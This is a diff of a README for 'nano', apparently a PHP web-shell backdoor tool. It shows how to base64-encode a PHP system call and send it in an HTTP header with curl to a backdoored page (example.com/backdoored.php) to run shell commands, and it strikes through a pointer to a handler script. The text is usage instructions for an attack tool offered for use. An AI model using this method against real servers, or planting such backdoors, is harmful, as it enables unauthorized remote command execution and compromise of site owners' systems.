deltaclock/nano/README.md

 Lets say you want to run `system(ls)` so write it as `system~ls` and then base64 encode it i.e. `c3lzdGVtKGxzKQ==`\
 Now open your terminal and type the following command\
 `curl -H 'x: c3lzdGVtKGxzKQ==' http://example.com/backdoored.php`\
-Too much work?
-You can use the [handler](https://github.com/UltimateHackers/nano/blob/master/handler.py) instead.
+~~Too much work?
+You can use the [handler](https://github.com/UltimateHackers/nano/blob/master/handler.py) instead.~~ The handler needs some redesigning which is not that important right now.

 ![handler](https://i.imgur.com/hkAHGwH.png)